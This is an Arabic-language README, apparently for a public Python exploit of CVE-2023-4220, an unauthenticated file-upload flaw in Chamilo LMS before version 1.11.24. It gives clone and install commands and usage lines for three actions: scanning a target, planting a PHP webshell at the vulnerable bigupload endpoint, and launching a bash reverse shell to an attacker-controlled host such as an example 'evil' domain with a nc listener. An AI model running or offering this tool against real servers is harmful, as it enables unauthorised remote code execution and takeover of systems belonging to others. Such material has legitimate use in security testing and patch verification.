
هذا نص برمجي مكتوب بلغة Python يتيح استغلال الثغرة الأمنية لبرنامج Chamilo LMS الموضحة في CVE-2023-4220
هذا نص برمجي مكتوب بلغة Python يتيح استغلال الثغرة الأمنية في برنامج Chamilo LMS الموصوفة في CVE-2023-4220. النظام عرضة للخطر في الإصدارات السابقة للإصدار 1.11.24.
قم باستنساخ المستودع إلى جهازك وقم بتثبيت التبعيات باستخدام pip (يُوصى باستخدام virtualenv لإنشاء بيئة لعزل هذه التثبيتات عن التثبيتات العامة)
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt
يحتاج النص البرمجي إلى عنوان URL الهدف مع المسار الجذري لـ Chamilo (مثل http://example.com/chamilo أو http://example.com أو http://chamilo.example.com) وإجراء لتنفيذه (هناك ثلاثة إجراءات متاحة: scan و webshell و revshell).
هذا الإجراء سيتحقق مما إذا كان الهدف عرضة للخطر عن طريق محاولة الوصول إلى نقطة النهاية /main/inc/lib/javascript/bigupload/files/.
python3 main.py -u http://example.com/chamilo -a scan

هذا الإجراء سيقوم بإنشاء ملف PHP webshell في نقطة النهاية الضعيفة.
python3 main.py -u http://example.com/chamilo -a webshell

هذا الإجراء سيقوم بإنشاء وتنفيذ ملف bash reverse shell. للقيام بذلك، سيتم أولاً إنشاء webshell باستخدام نفس الطريقة المستخدمة في الإجراء السابق. بعد ذلك، سيتم تنفيذ بعض الأوامر لإنشاء وتنفيذ الملف bash. تأكد من أنك تستمع على المنفذ الذي عرّفته باستخدام nc أو أي أداة أخرى لتحصل بالفعل على الاتصال العكسي. أيضًا، يمكن أن يكون المضيف عنوان IPv4 داخلي/عام صالح (مثل 172.17.1.4 أو 186.227.4.31) أو النطاق الذي قمت بتسجيله (مثل evil-vps.domainreg.net).
python3 main.py -u http://example.com/chamilo -a revshell

ملاحظة: قريبًا سأضيف خيار حمولة Windows للأجهزة المضيفة بنظام Windows